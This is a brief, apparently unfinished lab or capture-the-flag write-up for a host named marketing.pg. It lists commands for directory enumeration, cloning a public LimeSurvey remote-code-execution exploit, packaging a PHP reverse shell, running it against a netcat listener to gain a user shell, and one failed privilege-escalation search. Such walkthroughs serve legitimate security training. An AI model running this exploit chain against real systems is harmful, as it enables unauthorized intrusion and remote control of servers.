Running feroxbuster we discover /old/:

feroxbuster -u -C 404,400 -A --wordlist '/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt' -B --auto-tune

Now to check the difference:

curl http://marketing.pg/old/ > old.txt
curl http://marketing.pg/ > new.txt
diff old.txt new.txt

Using this exploit:

git clone https://github.com/Y1LD1R1M-1337/Limesurvey-RCE.git
cd Limesurvey-RCE

We can zip this now:

zip Y1LD1R1M.zip config.xml php-rev.php

Now we can run it after running listener:

sudo rlwrap nc -nlvp 80
python3 exploit.py http://customers-survey.marketing.pg/ admin password 80

We are t.miller now.

Now we can find files owned by group mlocate:

find / -group mlocate 2>/dev/null

Ughhhh didnt work will try later

Last updated